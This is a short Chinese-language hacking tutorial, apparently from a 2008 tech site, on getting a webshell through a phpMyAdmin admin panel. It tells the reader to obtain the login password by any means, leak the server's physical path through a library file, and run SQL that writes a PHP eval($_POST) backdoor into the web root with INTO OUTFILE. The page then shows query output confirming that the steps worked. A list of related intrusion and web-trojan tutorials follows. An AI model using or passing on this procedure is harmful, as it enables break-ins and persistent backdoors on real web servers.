教你phpMyAdmin 后台拿webshell

互联网   发布时间:2008-10-08 18:23:30   作者:佚名   我要评论
1.如何拿到登陆密码,自己想办法。 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径. 3.选择一个Database.运行以下语句. ----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php e

1.如何拿到登陆密码,自己想办法。
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell

您运行的 SQL 语句已经成功运行了。
SQL 查询:
CREATE TABLE a(
cmd text NOT NULL
);# MySQL 返回的查询结果为空(即零行)。
INSERT INTO a( cmd )
VALUES (
'<?php eval($_POST[1]);?>'
);# 影响列数: 1
SELECT cmd
FROM a
INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影响列数: 1
DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。


相关文章

  • 最经典的黑客入门教程(安全必备技能)

    无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点
    2013-04-16
  • 局域网入侵完全版

    首先申明:   1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;   2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口
    2009-06-09
  • 网页挂马详细步骤教程

    其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。 下面我介绍5种方
    2009-04-30
  • 详述入侵渗透技术

    入侵渗透涉及许多知识和技术,并不是一些人用一两招就可以搞定的。 一,踩点 踩点可以了解目标主机和网络的一些基本的安全信息,主要有; 1,管理员
    2008-10-08
  • 整人用的一个电脑重启病毒

    这篇文章主要介绍了整人用的一个电脑重启病毒,本文用bat文件伪造如QQ图标等常用软件,导致点击就会重启的恶作剧脚本,需要的朋友可以参考下
    2014-10-10
  • 如何判断电脑是否沦为“肉鸡”?

    今天有网友问小编怎样判断电脑是否沦为“肉鸡”,小编就来给大家盘点几条电脑沦为肉鸡的表现
    2014-08-14
  • Google 黑客搜索技巧

    站内搜索地址为: httpwww.google.comcustomdomains=(这里写我们要搜索的站点,比如feelids.com) 进去可以选择www和feelids.com, 当然再选我们要的站内搜索
    2008-10-08
  • 伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)

    黑客必须要有专业的知识,丰富的经验。而伪黑客不需要,只需要几个工具,扫描默认口令、弱口令、漏洞,就能利用。
    2012-05-18
  • 如何正确的进行网站入侵渗透测试

    入侵渗透涉及许多知识和技术,并不是一些人用一两招就可以搞定的,下面小编就为大家具体的讲解如何正确的进行网站入侵渗透测试,希望可以帮助到大家
    2016-10-28

最新评论